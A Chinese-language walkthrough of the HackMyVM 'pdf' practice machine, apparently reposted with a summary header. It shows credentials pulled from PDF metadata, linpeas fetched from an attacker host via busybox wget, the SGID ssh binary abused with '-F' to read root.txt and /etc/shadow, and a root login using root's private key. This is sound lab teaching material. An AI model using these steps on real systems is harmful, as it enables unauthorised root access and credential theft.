文章总结： 文档详述了HackMyVM靶场pdf的渗透流程。通过8080端口获取token，遍历数字MD5哈希PDF文件并提取SSH凭据。登录后利用busybox上传linpeas检测到SSHSGID异常，通过ssh-F参数读取root.txt，最后利用root私钥获取系统完全控制权限。 综合评分： 88 文章分类： 渗透测试,CTF,实战经验,WEB安全

，我们使用工具去查看

exiftool  下载.pdf

我们可以看到有用的信息，感觉是用户名和密码，我们去登录试试看

ssh登录

ssh [email protected]

我们可以看到登录成功的，我们去查看user.txt

查看user.txt

那么，接下来我们就是查看root.txt，我们进行提权试试看

结果没有可以利用的

既然，没有可以利用的，那么我们上传linpeas.sh脚本看看

上传脚本

发现还是没有wget,不过不要慌我有学了一个新的命令

我们可以使用busybox命令的

 busybox wget 192.168.137.102/1/linpeas.sh

我们可以看到下载成功，我们去运行脚本

我们可以看到root用户是可以使用ssh服务登录的

又可以看到/usr/bin/ssh的SGID异常，它是标红的

那么我们可以使用ssh去读取文件的

读取root.txt

我们试试能不能读取root.txt文件吧

LFILE=file_to_readssh -F /root/root.txt localhost

我们可以看到读取成功了，我们成功获取到root.txt

至此，这个靶场渗透成功

复盘

既然我们可以读取root.txt,那么我们也可以去读取shadow,去爆破root的密码试试看，前面告诉我们可以使用ssh登录root的，我们试试能不能登录成功

我们成功读取的shadow文件，但是我们发现字母全部都是小写的，我们知道密码应该是有大小写组成的，所以我们直接去爆破是没有用的

 root:$6$qgppm7vz3uxoh2kt$vkj8.on1has6b9.tm8ms5fwhmvmxrvz29bcznqmjfqojkphvaznoozhyt0.o2x3s3nbqrswpci.lhvk94armu.:20263:0:99999:7:::

我们可以看到kali里面的root用户的密码都是大小写组成的

既然我们爆破不了root的密码，我们试试能不能使用私钥去登录root用户的，我们不要去读取，因为它读取出来全部是小写的字母的，我们读取也没有用的

ssh  [email protected] -i /root/.ssh/id_rsa

我们可以看到是登录成功的，然后我们再去看看shadow文件，可以看到root的密码是有大小写的

然后我去爆破root密码，结果没有爆破出来的

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：MS02423 MS02423《HackMyVm靶场之pdf》